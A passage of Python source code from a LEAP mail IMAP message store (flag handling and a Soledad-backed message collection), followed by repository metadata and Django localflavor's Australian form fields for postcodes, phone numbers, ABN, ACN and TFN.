elif mode == REMOVE:
newflags = tuple(set(current).difference(set(flags)))
elif mode == SET:
newflags = flags
# We could defer this, but I think it's better
# to put it under the lock...
doc.content[self.FLAGS_KEY] = newflags
doc.content[self.SEEN_KEY] = self.SEEN_FLAG in flags
doc.content[self.DEL_KEY] = self.DELETED_FLAG in flags
if self._collection.memstore is not None:
log.msg("putting message in collection")
self._collection.memstore.put_message(
self._mbox, self._uid,
MessageWrapper(fdoc=doc.content, new=False, dirty=True,
docs_id={'fdoc': doc.doc_id}))
else:
# fallback for non-memstore initializations.
self._soledad.put_doc(doc)
return map(str, newflags)
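    # Usage sketch for the ``mode`` argument (illustrative only; ``msg`` is
    # a LeapMessage instance):
    #
    #     msg.setFlags(('\\Seen',), 1)       # append \Seen
    #     msg.setFlags(('\\Deleted',), -1)   # remove \Deleted
    #     msg.setFlags(('\\Seen',), 0)       # replace the whole flag set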
def getInternalDate(self):
"""
Retrieve the date internally associated with this message
:rtype: C{str}
:return: An RFC822-formatted date string.
"""
date = self._hdoc.content.get(self.DATE_KEY, '')
return str(date)
#
# IMessagePart
#
# XXX we should implement this interface too for the subparts
# so we allow nested parts...
def getBodyFile(self):
"""
Retrieve a file object containing only the body of this message.
:return: file-like object opened for reading
:rtype: StringIO
"""
def write_fd(body):
fd.write(body)
fd.seek(0)
return fd
# TODO refactor with getBodyFile in MessagePart
fd = StringIO.StringIO()
if self._bdoc is not None:
bdoc_content = self._bdoc.content
if empty(bdoc_content):
logger.warning("No BDOC content found for message!!!")
return write_fd("")
body = bdoc_content.get(self.RAW_KEY, "")
content_type = bdoc_content.get('content-type', "")
charset = find_charset(content_type)
logger.debug('got charset from content-type: %s' % charset)
if charset is None:
charset = self._get_charset(body)
try:
if isinstance(body, unicode):
body = body.encode(charset)
except UnicodeError as exc:
logger.error(
"Unicode error, using 'replace'. {0!r}".format(exc))
logger.debug("Attempted to encode with: %s" % charset)
body = body.encode(charset, 'replace')
finally:
return write_fd(body)
# We are still returning funky characters from here.
else:
logger.warning("No BDOC found for message.")
return write_fd("")
@memoized_method
def _get_charset(self, stuff):
"""
Gets (guesses?) the charset of a payload.
:param stuff: the stuff to guess about.
:type stuff: basestring
:returns: charset
"""
# XXX shouldn't we make the scope
# of the decorator somewhat more persistent?
# ah! yes! and put memory bounds.
return get_email_charset(stuff)
def getSize(self):
"""
Return the total size, in octets, of this message.
:return: size of the message, in octets
:rtype: int
"""
size = None
if self._fdoc:
fdoc_content = self._fdoc.content
size = fdoc_content.get(self.SIZE_KEY, False)
else:
logger.warning("No FLAGS doc for %s:%s" % (self._mbox,
self._uid))
if not size:
# XXX fallback, should remove when all migrated.
size = self.getBodyFile().len
return size
def getHeaders(self, negate, *names):
"""
Retrieve a group of message headers.
:param names: The names of the headers to retrieve or omit.
:type names: tuple of str
:param negate: If True, indicates that the headers listed in names
should be omitted from the return value, rather
than included.
:type negate: bool
:return: A mapping of header field names to header field values
:rtype: dict
"""
# TODO split in smaller methods
# XXX refactor together with MessagePart method
headers = self._get_headers()
if not headers:
logger.warning("No headers found")
return {str('content-type'): str('')}
names = map(lambda s: s.upper(), names)
if negate:
cond = lambda key: key.upper() not in names
else:
cond = lambda key: key.upper() in names
if isinstance(headers, list):
headers = dict(headers)
# default to most likely standard
charset = find_charset(headers, "utf-8")
headers2 = dict()
for key, value in headers.items():
# twisted imap server expects *some* headers to be lowercase
# We could use a CaseInsensitiveDict here...
if key.lower() == "content-type":
key = key.lower()
if not isinstance(key, str):
key = key.encode(charset, 'replace')
if not isinstance(value, str):
value = value.encode(charset, 'replace')
if value.endswith(";"):
# bastards
value = value[:-1]
# filter original dict by negate-condition
if cond(key):
headers2[key] = value
return headers2
def _get_headers(self):
"""
Return the headers dict for this message.
"""
if self._hdoc is not None:
hdoc_content = self._hdoc.content
headers = hdoc_content.get(self.HEADERS_KEY, {})
return headers
else:
logger.warning(
"No HEADERS doc for msg %s:%s" % (
self._mbox,
self._uid))
def isMultipart(self):
"""
Return True if this message is multipart.
"""
if self._fdoc:
fdoc_content = self._fdoc.content
is_multipart = fdoc_content.get(self.MULTIPART_KEY, False)
return is_multipart
else:
logger.warning(
"No FLAGS doc for msg %s:%s" % (
self._mbox,
self._uid))
def getSubPart(self, part):
"""
Retrieve a MIME submessage
:type part: C{int}
:param part: The number of the part to retrieve, indexed from 0.
:raise IndexError: Raised if the specified part does not exist.
:raise TypeError: Raised if this message is not multipart.
:rtype: Any object implementing C{IMessagePart}.
:return: The specified sub-part.
"""
if not self.isMultipart():
raise TypeError
try:
pmap_dict = self._get_part_from_parts_map(part + 1)
except KeyError:
raise IndexError
return MessagePart(self._soledad, pmap_dict)
#
# accessors
#
def _get_part_from_parts_map(self, part):
"""
Get a part map from the headers doc
:raises: KeyError if key does not exist
:rtype: dict
"""
if not self._hdoc:
logger.warning("Tried to get part but no HDOC found!")
return None
hdoc_content = self._hdoc.content
pmap = hdoc_content.get(fields.PARTS_MAP_KEY, {})
# remember, lads, soledad is using strings in its keys,
# not integers!
return pmap[str(part)]
# XXX moved to memory store
# move the rest too. ------------------------------------------
def _get_flags_doc(self):
"""
Return the document that keeps the flags for this
message.
"""
result = {}
try:
flag_docs = self._soledad.get_from_index(
fields.TYPE_MBOX_UID_IDX,
fields.TYPE_FLAGS_VAL, self._mbox, str(self._uid))
result = first(flag_docs)
except Exception as exc:
# ugh! Something's broken down there!
logger.warning("ERROR while getting flags for UID: %s" % self._uid)
logger.exception(exc)
finally:
return result
def _get_headers_doc(self):
"""
Return the document that keeps the headers for this
message.
"""
head_docs = self._soledad.get_from_index(
fields.TYPE_C_HASH_IDX,
fields.TYPE_HEADERS_VAL, str(self._chash))
return first(head_docs)
def _get_body_doc(self):
"""
Return the document that keeps the body for this
message.
"""
hdoc_content = self._hdoc.content
body_phash = hdoc_content.get(
fields.BODY_KEY, None)
if not body_phash:
logger.warning("No body phash for this document!")
return None
# XXX get from memstore too...
# if memstore: memstore.get_phrash
# memstore should keep a dict with weakrefs to the
# phash doc...
if self._container is not None:
bdoc = self._container.memstore.get_cdoc_from_phash(body_phash)
if not empty(bdoc) and not empty(bdoc.content):
return bdoc
# no memstore, or no body doc found there
if self._soledad:
body_docs = self._soledad.get_from_index(
fields.TYPE_P_HASH_IDX,
fields.TYPE_CONTENT_VAL, str(body_phash))
return first(body_docs)
else:
logger.error("No phash in container, and no soledad found!")
def __getitem__(self, key):
"""
Return an item from the content of the flags document,
for convenience.
:param key: The key
:type key: str
:return: The content value indexed by C{key} or None
:rtype: str
"""
return self._fdoc.content.get(key, None)
def does_exist(self):
"""
Return True if there is actually a flags document for this
UID and mbox.
"""
return not empty(self._fdoc)
class MessageCollection(WithMsgFields, IndexedDB, MailParser, MBoxParser):
"""
A collection of messages, surprisingly.
It is tied to a selected mailbox name that is passed to its constructor.
Implements a filter query over the messages contained in a soledad
database.
"""
# XXX this should be able to produce a MessageSet methinks
# could validate these kinds of objects turning them
# into a template for the class.
FLAGS_DOC = "FLAGS"
HEADERS_DOC = "HEADERS"
CONTENT_DOC = "CONTENT"
"""
RECENT_DOC is a document that stores a list of the UIDs
    with the recent flag for this mailbox. It deserves special treatment
because:
(1) it cannot be set by the user
    (2) it's a flag that we set immediately after a fetch, which is quite
often.
(3) we need to be able to set/unset it in batches without doing a single
write for each element in the sequence.
"""
RECENT_DOC = "RECENT"
"""
HDOCS_SET_DOC is a document that stores a set of the Document-IDs
(the u1db index) for all the headers documents for a given mailbox.
We use it to prefetch massively all the headers for a mailbox.
This is the second massive query, after fetching all the FLAGS, that
a MUA will do in a case where we do not have local disk cache.
"""
HDOCS_SET_DOC = "HDOCS_SET"
templates = {
# Message Level
FLAGS_DOC: {
fields.TYPE_KEY: fields.TYPE_FLAGS_VAL,
            fields.UID_KEY: 1,  # XXX move to a local table
fields.MBOX_KEY: fields.INBOX_VAL,
fields.CONTENT_HASH_KEY: "",
fields.SEEN_KEY: False,
fields.DEL_KEY: False,
fields.FLAGS_KEY: [],
fields.MULTIPART_KEY: False,
fields.SIZE_KEY: 0
},
HEADERS_DOC: {
fields.TYPE_KEY: fields.TYPE_HEADERS_VAL,
fields.CONTENT_HASH_KEY: "",
fields.DATE_KEY: "",
fields.SUBJECT_KEY: "",
fields.HEADERS_KEY: {},
fields.PARTS_MAP_KEY: {},
},
CONTENT_DOC: {
fields.TYPE_KEY: fields.TYPE_CONTENT_VAL,
fields.PAYLOAD_HASH_KEY: "",
fields.LINKED_FROM_KEY: [],
fields.CTYPE_KEY: "", # should index by this too
            # should only get immutable headers parts
            # (for indexing)
            fields.HEADERS_KEY: {},
            fields.RAW_KEY: "",
            fields.PARTS_MAP_KEY: {},
fields.MULTIPART_KEY: False,
},
# Mailbox Level
RECENT_DOC: {
fields.TYPE_KEY: fields.TYPE_RECENT_VAL,
fields.MBOX_KEY: fields.INBOX_VAL,
fields.RECENTFLAGS_KEY: [],
},
HDOCS_SET_DOC: {
fields.TYPE_KEY: fields.TYPE_HDOCS_SET_VAL,
fields.MBOX_KEY: fields.INBOX_VAL,
fields.HDOCS_SET_KEY: [],
}
}
# Different locks for wrapping both the u1db document getting/setting
    # and the property getting/setting in an atomic operation.
# TODO we would abstract this to a SoledadProperty class
_rdoc_lock = threading.Lock()
_rdoc_property_lock = threading.Lock()
_hdocset_lock = threading.Lock()
_hdocset_property_lock = threading.Lock()
def __init__(self, mbox=None, soledad=None, memstore=None):
"""
Constructor for MessageCollection.
On initialization, we ensure that we have a document for
        storing the recent flags. The nature of this flag makes us want
to store the set of the UIDs with this flag at the level of the
MessageCollection for each mailbox, instead of treating them
as a property of each message.
We are passed an instance of MemoryStore, the same for the
SoledadBackedAccount, that we use as a read cache and a buffer
for writes.
:param mbox: the name of the mailbox. It is the name
with which we filter the query over the
messages database.
:type mbox: str
:param soledad: Soledad database
:type soledad: Soledad instance
:param memstore: a MemoryStore instance
:type memstore: MemoryStore
"""
MailParser.__init__(self)
leap_assert(mbox, "Need a mailbox name to initialize")
leap_assert(mbox.strip() != "", "mbox cannot be blank space")
leap_assert(isinstance(mbox, (str, unicode)),
"mbox needs to be a string")
leap_assert(soledad, "Need a soledad instance to initialize")
# okay, all in order, keep going...
self.mbox = self._parse_mailbox_name(mbox)
# XXX get a SoledadStore passed instead
self._soledad = soledad
self.memstore = memstore
self.__rflags = None
self.__hdocset = None
self.initialize_db()
# ensure that we have a recent-flags and a hdocs-sec doc
self._get_or_create_rdoc()
# Not for now...
#self._get_or_create_hdocset()
def _get_empty_doc(self, _type=FLAGS_DOC):
"""
Returns an empty doc for storing different message parts.
Defaults to returning a template for a flags document.
:return: a dict with the template
:rtype: dict
"""
        if _type not in self.templates:
raise TypeError("Improper type passed to _get_empty_doc")
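        # deep copy, so that the nested dicts in the template (headers,
        # parts map, ...) are never shared between message documents.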
return copy.deepcopy(self.templates[_type])
def _get_or_create_rdoc(self):
"""
Try to retrieve the recent-flags doc for this MessageCollection,
and create one if not found.
"""
rdoc = self._get_recent_doc()
if not rdoc:
rdoc = self._get_empty_doc(self.RECENT_DOC)
if self.mbox != fields.INBOX_VAL:
rdoc[fields.MBOX_KEY] = self.mbox
self._soledad.create_doc(rdoc)
def _get_or_create_hdocset(self):
"""
Try to retrieve the hdocs-set doc for this MessageCollection,
and create one if not found.
"""
hdocset = self._get_hdocset_doc()
if not hdocset:
hdocset = self._get_empty_doc(self.HDOCS_SET_DOC)
if self.mbox != fields.INBOX_VAL:
hdocset[fields.MBOX_KEY] = self.mbox
self._soledad.create_doc(hdocset)
def _do_parse(self, raw):
"""
Parse raw message and return it along with
relevant information about its outer level.
:param raw: the raw message
:type raw: StringIO or basestring
:return: msg, chash, size, multi
:rtype: tuple
"""
msg = self._get_parsed_msg(raw)
chash = self._get_hash(msg)
size = len(msg.as_string())
multi = msg.is_multipart()
return msg, chash, size, multi
def _populate_flags(self, flags, uid, chash, size, multi):
"""
Return a flags doc.
XXX Missing DOC -----------
"""
fd = self._get_empty_doc(self.FLAGS_DOC)
fd[self.MBOX_KEY] = self.mbox
fd[self.UID_KEY] = uid
fd[self.CONTENT_HASH_KEY] = chash
fd[self.SIZE_KEY] = size
fd[self.MULTIPART_KEY] = multi
if flags:
fd[self.FLAGS_KEY] = map(self._stringify, flags)
fd[self.SEEN_KEY] = self.SEEN_FLAG in flags
fd[self.DEL_KEY] = self.DELETED_FLAG in flags
fd[self.RECENT_KEY] = True # set always by default
return fd
def _populate_headr(self, msg, chash, subject, date):
"""
Return a headers doc.
XXX Missing DOC -----------
"""
headers = defaultdict(list)
for k, v in msg.items():
headers[k].append(v)
# "fix" for repeated headers.
for k, v in headers.items():
newline = "\n%s: " % (k,)
headers[k] = newline.join(v)
lower_headers = lowerdict(headers)
msgid = first(MSGID_RE.findall(
lower_headers.get('message-id', '')))
hd = self._get_empty_doc(self.HEADERS_DOC)
hd[self.CONTENT_HASH_KEY] = chash
hd[self.HEADERS_KEY] = headers
hd[self.MSGID_KEY] = msgid
if not subject and self.SUBJECT_FIELD in headers:
hd[self.SUBJECT_KEY] = headers[self.SUBJECT_FIELD]
else:
hd[self.SUBJECT_KEY] = subject
if not date and self.DATE_FIELD in headers:
hd[self.DATE_KEY] = headers[self.DATE_FIELD]
else:
hd[self.DATE_KEY] = date
return hd
def _fdoc_already_exists(self, chash):
"""
Check whether we can find a flags doc for this mailbox with the
        given content-hash. It enforces that we can only have the same message
        listed once for a given mailbox.
:param chash: the content-hash to check about.
:type chash: basestring
:return: False, if it does not exist, or UID.
"""
exist = False
if self.memstore is not None:
exist = self.memstore.get_fdoc_from_chash(chash, self.mbox)
if not exist:
exist = self._get_fdoc_from_chash(chash)
if exist:
return exist.content.get(fields.UID_KEY, "unknown-uid")
else:
return False
def add_msg(self, raw, subject=None, flags=None, date=None, uid=None,
notify_on_disk=False):
"""
Creates a new message document.
:param raw: the raw message
:type raw: str
:param subject: subject of the message.
:type subject: str
:param flags: flags
:type flags: list
:param date: the received date for the message
:type date: str
:param uid: the message uid for this mailbox
:type uid: int
:return: a deferred that will be fired with the message
uid when the adding succeed.
:rtype: deferred
"""
logger.debug('adding message')
if flags is None:
flags = tuple()
leap_assert_type(flags, tuple)
d = defer.Deferred()
self._do_add_msg(raw, flags, subject, date, notify_on_disk, d)
return d
# We SHOULD defer this (or the heavy load here) to the thread pool,
# but it gives troubles with the QSocketNotifier used by Qt...
def _do_add_msg(self, raw, flags, subject, date, notify_on_disk, observer):
"""
Helper that creates a new message document.
Here lives the magic of the leap mail. Well, in soledad, really.
See `add_msg` docstring for parameter info.
:param observer: a deferred that will be fired with the message
uid when the adding succeed.
:type observer: deferred
"""
# TODO signal that we can delete the original message!-----
# when all the processing is done.
# TODO add the linked-from info !
# TODO add reference to the original message
# parse
msg, chash, size, multi = self._do_parse(raw)
# check for uniqueness --------------------------------
# XXX profiler says that this test is costly.
# So we probably should just do an in-memory check and
# move the complete check to the soledad writer?
# Watch out! We're reserving a UID right after this!
existing_uid = self._fdoc_already_exists(chash)
if existing_uid:
logger.warning("We already have that message in this "
"mailbox, unflagging as deleted")
uid = existing_uid
msg = self.get_msg_by_uid(uid)
msg.setFlags((fields.DELETED_FLAG,), -1)
# XXX if this is deferred to thread again we should not use
# the callback in the deferred thread, but return and
# call the callback from the caller fun...
observer.callback(uid)
return
uid = self.memstore.increment_last_soledad_uid(self.mbox)
logger.info("ADDING MSG WITH UID: %s" % uid)
fd = self._populate_flags(flags, uid, chash, size, multi)
hd = self._populate_headr(msg, chash, subject, date)
parts = walk.get_parts(msg)
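        # pick the body-phash helper by indexing with the boolean flag:
        # index 0 (simple) for single-part messages, 1 for multipart.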
body_phash_fun = [walk.get_body_phash_simple,
walk.get_body_phash_multi][int(multi)]
body_phash = body_phash_fun(walk.get_payloads(msg))
parts_map = walk.walk_msg_tree(parts, body_phash=body_phash)
# add parts map to header doc
# (body, multi, part_map)
for key in parts_map:
hd[key] = parts_map[key]
del parts_map
hd = stringify_parts_map(hd)
# The MessageContainer expects a dict, one-indexed
cdocs = dict(enumerate(walk.get_raw_docs(msg, parts), 1))
self.set_recent_flag(uid)
msg_container = MessageWrapper(fd, hd, cdocs)
self.memstore.create_message(self.mbox, uid, msg_container,
observer=observer,
notify_on_disk=notify_on_disk)
#
# getters: specific queries
#
# recent flags
def _get_recent_flags(self):
"""
An accessor for the recent-flags set for this mailbox.
"""
# XXX check if we should remove this
if self.__rflags is not None:
return self.__rflags
if self.memstore is not None:
with self._rdoc_lock:
rflags = self.memstore.get_recent_flags(self.mbox)
if not rflags:
# not loaded in the memory store yet.
# let's fetch them from soledad...
rdoc = self._get_recent_doc()
rflags = set(rdoc.content.get(
fields.RECENTFLAGS_KEY, []))
# ...and cache them now.
self.memstore.load_recent_flags(
self.mbox,
{'doc_id': rdoc.doc_id, 'set': rflags})
return rflags
#else:
# fallback for cases without memory store
#with self._rdoc_lock:
#rdoc = self._get_recent_doc()
#self.__rflags = set(rdoc.content.get(
#fields.RECENTFLAGS_KEY, []))
#return self.__rflags
def _set_recent_flags(self, value):
"""
Setter for the recent-flags set for this mailbox.
"""
if self.memstore is not None:
self.memstore.set_recent_flags(self.mbox, value)
#else:
# fallback for cases without memory store
#with self._rdoc_lock:
#rdoc = self._get_recent_doc()
#newv = set(value)
#self.__rflags = newv
#rdoc.content[fields.RECENTFLAGS_KEY] = list(newv)
# XXX should deferLater 0 it?
#self._soledad.put_doc(rdoc)
recent_flags = property(
_get_recent_flags, _set_recent_flags,
doc="Set of UIDs with the recent flag for this mailbox.")
# XXX change naming, indicate soledad query.
def _get_recent_doc(self):
"""
Get recent-flags document from Soledad for this mailbox.
:rtype: SoledadDocument or None
"""
curried = partial(
self._soledad.get_from_index,
fields.TYPE_MBOX_IDX,
fields.TYPE_RECENT_VAL, self.mbox)
curried.expected = "rdoc"
rdoc = try_unique_query(curried)
return rdoc
# Property-set modification (protected by a different
# lock to give atomicity to the read/write operation)
def unset_recent_flags(self, uids):
"""
Unset Recent flag for a sequence of uids.
:param uids: the uids to unset
        :type uids: sequence
"""
with self._rdoc_property_lock:
self.recent_flags.difference_update(
set(uids))
# Individual flags operations
def unset_recent_flag(self, uid):
"""
Unset Recent flag for a given uid.
:param uid: the uid to unset
:type uid: int
"""
with self._rdoc_property_lock:
self.recent_flags.difference_update(
set([uid]))
@deferred_to_thread
def set_recent_flag(self, uid):
"""
Set Recent flag for a given uid.
:param uid: the uid to set
:type uid: int
"""
with self._rdoc_property_lock:
self.recent_flags = self.recent_flags.union(
set([uid]))
# individual doc getters, message layer.
def _get_fdoc_from_chash(self, chash):
"""
Return a flags document for this mailbox with a given chash.
:return: A SoledadDocument containing the Flags Document, or None if
the query failed.
:rtype: SoledadDocument or None.
"""
curried = partial(
self._soledad.get_from_index,
fields.TYPE_MBOX_C_HASH_IDX,
fields.TYPE_FLAGS_VAL, self.mbox, chash)
curried.expected = "fdoc"
return try_unique_query(curried)
def _get_uid_from_msgidCb(self, msgid):
hdoc = None
curried = partial(
self._soledad.get_from_index,
fields.TYPE_MSGID_IDX,
fields.TYPE_HEADERS_VAL, msgid)
curried.expected = "hdoc"
hdoc = try_unique_query(curried)
if hdoc is None:
logger.warning("Could not find hdoc for msgid %s"
% (msgid,))
return None
msg_chash = hdoc.content.get(fields.CONTENT_HASH_KEY)
fdoc = self._get_fdoc_from_chash(msg_chash)
if not fdoc:
logger.warning("Could not find fdoc for msgid %s"
% (msgid,))
return None
return fdoc.content.get(fields.UID_KEY, None)
@deferred_to_thread
def _get_uid_from_msgid(self, msgid):
"""
Return a UID for a given message-id.
It first gets the headers-doc for that msg-id, and
        if found, it queries the flags doc for the current mailbox
for the matching content-hash.
:return: A UID, or None
"""
# We need to wait a little bit, cause in some of the cases
# the query is received right after we've saved the document,
# and we cannot find it otherwise. This seems to be enough.
# XXX do a deferLater instead ??
# XXX is this working?
return self._get_uid_from_msgidCb(msgid)
def set_flags(self, mbox, messages, flags, mode, observer):
"""
Set flags for a sequence of messages.
:param mbox: the mbox this message belongs to
:type mbox: str or unicode
:param messages: the messages to iterate through
:type messages: sequence
        :param flags: the flags to be set
:type flags: tuple
:param mode: the mode for setting. 1 is append, -1 is remove, 0 set.
:type mode: int
:param observer: a deferred that will be called with the dictionary
mapping UIDs to flags after the operation has been
done.
:type observer: deferred
"""
# XXX we could defer *this* to thread pool, and gather results...
# XXX use deferredList
deferreds = []
for msg_id in messages:
deferreds.append(
self._set_flag_for_uid(msg_id, flags, mode))
def notify(result):
observer.callback(dict(result))
d1 = defer.gatherResults(deferreds, consumeErrors=True)
d1.addCallback(notify)
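    # A minimal usage sketch (``col`` stands in for a MessageCollection;
    # the observer deferred is fired with a {uid: flags} mapping):
    #
    #     d = defer.Deferred()
    #     d.addCallback(log.msg)
    #     col.set_flags("inbox", [1, 2, 3], ('\\Seen',), 1, d)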
@deferred_to_thread
def _set_flag_for_uid(self, msg_id, flags, mode):
"""
Run the set_flag operation in the thread pool.
"""
log.msg("MSG ID = %s" % msg_id)
msg = self.get_msg_by_uid(msg_id, mem_only=True, flags_only=True)
if msg is not None:
return msg_id, msg.setFlags(flags, mode)
# getters: generic for a mailbox
def get_msg_by_uid(self, uid, mem_only=False, flags_only=False):
"""
Retrieves a LeapMessage by UID.
        This is used primarily in the Mailbox fetch and store methods.
:param uid: the message uid to query by
:type uid: int
:param mem_only: a flag that indicates whether this Message should
pass a reference to soledad to retrieve missing pieces
or not.
:type mem_only: bool
:param flags_only: whether the message should carry only a reference
to the flags document.
:type flags_only: bool
:return: A LeapMessage instance matching the query,
or None if not found.
:rtype: LeapMessage
"""
msg_container = self.memstore.get_message(self.mbox, uid, flags_only)
if msg_container is not None:
if mem_only:
msg = LeapMessage(None, uid, self.mbox, collection=self,
container=msg_container)
else:
# We pass a reference to soledad just to be able to retrieve
# missing parts that cannot be found in the container, like
# the content docs after a copy.
msg = LeapMessage(self._soledad, uid, self.mbox,
collection=self, container=msg_container)
else:
msg = LeapMessage(self._soledad, uid, self.mbox, collection=self)
if not msg.does_exist():
return None
return msg
def get_all_docs(self, _type=fields.TYPE_FLAGS_VAL):
"""
Get all documents for the selected mailbox of the
passed type. By default, it returns the flag docs.
        If you want access to the content, use __iter__ instead
:return: a list of u1db documents
:rtype: list of SoledadDocument
"""
if _type not in fields.__dict__.values():
raise TypeError("Wrong type passed to get_all_docs")
if sameProxiedObjects(self._soledad, None):
logger.warning('Tried to get messages but soledad is None!')
return []
all_docs = [doc for doc in self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
_type, self.mbox)]
        # inefficient, but first let's grok it and then
# let's worry about efficiency.
# XXX FIXINDEX -- should implement order by in soledad
# FIXME ----------------------------------------------
return sorted(all_docs, key=lambda item: item.content['uid'])
def all_soledad_uid_iter(self):
"""
Return an iterator through the UIDs of all messages, sorted in
ascending order.
"""
db_uids = set([doc.content[self.UID_KEY] for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)])
return db_uids
def all_uid_iter(self):
"""
Return an iterator through the UIDs of all messages, from memory.
"""
if self.memstore is not None:
mem_uids = self.memstore.get_uids(self.mbox)
soledad_known_uids = self.memstore.get_soledad_known_uids(
self.mbox)
combined = tuple(set(mem_uids).union(soledad_known_uids))
return combined
# XXX MOVE to memstore
def all_flags(self):
"""
Return a dict with all flags documents for this mailbox.
"""
# XXX get all from memstore and cache it there
        # FIXME should get all uids, get them from memstore,
# and get only the missing ones from disk.
all_flags = dict(((
doc.content[self.UID_KEY],
doc.content[self.FLAGS_KEY]) for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)))
if self.memstore is not None:
uids = self.memstore.get_uids(self.mbox)
docs = ((uid, self.memstore.get_message(self.mbox, uid))
for uid in uids)
for uid, doc in docs:
all_flags[uid] = doc.fdoc.content[self.FLAGS_KEY]
return all_flags
def all_flags_chash(self):
"""
Return a dict with the content-hash for all flag documents
for this mailbox.
"""
all_flags_chash = dict(((
doc.content[self.UID_KEY],
doc.content[self.CONTENT_HASH_KEY]) for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)))
return all_flags_chash
def all_headers(self):
"""
Return a dict with all the headers documents for this
mailbox.
"""
all_headers = dict(((
doc.content[self.CONTENT_HASH_KEY],
doc.content[self.HEADERS_KEY]) for doc in
self._soledad.get_docs(self._hdocset)))
return all_headers
def count(self):
"""
Return the count of messages for this mailbox.
:rtype: int
"""
# XXX We should cache this in memstore too until next write...
count = self._soledad.get_count_from_index(
fields.TYPE_MBOX_IDX,
fields.TYPE_FLAGS_VAL, self.mbox)
if self.memstore is not None:
count += self.memstore.count_new()
return count
# unseen messages
def unseen_iter(self):
"""
Get an iterator for the message UIDs with no `seen` flag
for this mailbox.
:return: iterator through unseen message doc UIDs
:rtype: iterable
"""
return (doc.content[self.UID_KEY] for doc in
self._soledad.get_from_index(
fields.TYPE_MBOX_SEEN_IDX,
fields.TYPE_FLAGS_VAL, self.mbox, '0'))
def count_unseen(self):
"""
Count all messages with the `Unseen` flag.
:returns: count
:rtype: int
"""
count = self._soledad.get_count_from_index(
fields.TYPE_MBOX_SEEN_IDX,
fields.TYPE_FLAGS_VAL, self.mbox, '0')
return count
def get_unseen(self):
"""
Get all messages with the `Unseen` flag
:returns: a list of LeapMessages
:rtype: list
"""
return [LeapMessage(self._soledad, docid, self.mbox)
for docid in self.unseen_iter()]
# recent messages
# XXX take it from memstore
def count_recent(self):
"""
Count all messages with the `Recent` flag.
It just retrieves the length of the recent_flags set,
which is stored in a specific type of document for
this collection.
:returns: count
:rtype: int
"""
return len(self.recent_flags)
def __len__(self):
"""
Returns the number of messages on this mailbox.
:rtype: int
"""
return self.count()
def __iter__(self):
"""
Returns an iterator over all messages.
:returns: iterator of dicts with content for all messages.
:rtype: iterable
"""
return (LeapMessage(self._soledad, docuid, self.mbox)
for docuid in self.all_uid_iter())
def __repr__(self):
"""
Representation string for this object.
"""
return u"<MessageCollection: mbox '%s' (%s)>" % (
self.mbox, self.count())
# XXX should implement __eq__ also !!!
# use chash...
|
gpl-3.0
| -1,798,522,859,234,019,600 | 32.048886 | 79 | 0.563964 | false |
jieter/django-localflavor
|
localflavor/au/forms.py
|
1
|
4119
|
"""Australian-specific Form helpers."""
from __future__ import unicode_literals
import re
from django.forms import ValidationError
from django.forms.fields import CharField, RegexField, Select
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from localflavor.compat import EmptyValueCompatMixin
from localflavor.deprecation import DeprecatedPhoneNumberFormFieldMixin
from .au_states import STATE_CHOICES
from .validators import AUBusinessNumberFieldValidator, AUCompanyNumberFieldValidator, AUTaxFileNumberFieldValidator
PHONE_DIGITS_RE = re.compile(r'^(\d{10})$')
class AUPostCodeField(RegexField):
"""
Australian post code field.
Assumed to be 4 digits.
Northern Territory 3-digit postcodes should have leading zero.
"""
default_error_messages = {
'invalid': _('Enter a 4 digit postcode.'),
}
def __init__(self, max_length=4, min_length=None, *args, **kwargs):
super(AUPostCodeField, self).__init__(r'^\d{4}$',
max_length, min_length, *args, **kwargs)
class AUPhoneNumberField(EmptyValueCompatMixin, CharField, DeprecatedPhoneNumberFormFieldMixin):
"""
A form field that validates input as an Australian phone number.
Valid numbers have ten digits.
"""
default_error_messages = {
'invalid': 'Phone numbers must contain 10 digits.',
}
def clean(self, value):
"""Validate a phone number. Strips parentheses, whitespace and hyphens."""
super(AUPhoneNumberField, self).clean(value)
if value in self.empty_values:
return self.empty_value
        value = re.sub(r'(\(|\)|\s+|-)', '', force_text(value))
phone_match = PHONE_DIGITS_RE.search(value)
if phone_match:
return '%s' % phone_match.group(1)
raise ValidationError(self.error_messages['invalid'])
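    # Illustrative example (not part of the original module): cleaning
    # '(02) 9876 5432' strips the punctuation and returns '0298765432';
    # any value without exactly ten digits raises ValidationError.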
class AUStateSelect(Select):
"""A Select widget that uses a list of Australian states/territories as its choices."""
def __init__(self, attrs=None):
super(AUStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
class AUBusinessNumberField(EmptyValueCompatMixin, CharField):
"""
A form field that validates input as an Australian Business Number (ABN).
.. versionadded:: 1.3
.. versionchanged:: 1.4
"""
default_validators = [AUBusinessNumberFieldValidator()]
def to_python(self, value):
value = super(AUBusinessNumberField, self).to_python(value)
if value in self.empty_values:
return self.empty_value
return value.upper().replace(' ', '')
def prepare_value(self, value):
"""Format the value for display."""
if value is None:
return value
spaceless = ''.join(value.split())
return '{} {} {} {}'.format(spaceless[:2], spaceless[2:5], spaceless[5:8], spaceless[8:])
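    # e.g. prepare_value('51824753556') -> '51 824 753 556' (2-3-3-3
    # grouping; the digits above are only an illustration).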
class AUCompanyNumberField(EmptyValueCompatMixin, CharField):
"""
A form field that validates input as an Australian Company Number (ACN).
.. versionadded:: 1.5
"""
default_validators = [AUCompanyNumberFieldValidator()]
def to_python(self, value):
value = super(AUCompanyNumberField, self).to_python(value)
if value in self.empty_values:
return self.empty_value
return value.upper().replace(' ', '')
def prepare_value(self, value):
"""Format the value for display."""
if value is None:
return value
spaceless = ''.join(value.split())
return '{} {} {}'.format(spaceless[:3], spaceless[3:6], spaceless[6:])
class AUTaxFileNumberField(CharField):
"""
A form field that validates input as an Australian Tax File Number (TFN).
.. versionadded:: 1.4
"""
default_validators = [AUTaxFileNumberFieldValidator()]
def prepare_value(self, value):
"""Format the value for display."""
if value is None:
return value
spaceless = ''.join(value.split())
return '{} {} {}'.format(spaceless[:3], spaceless[3:6], spaceless[6:])
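# Minimal usage sketch (illustrative; assumes a configured Django settings
# module, and the form/field names below belong to this sketch, not to the
# package itself):
#
#     from django import forms
#
#     class BusinessForm(forms.Form):
#         postcode = AUPostCodeField()
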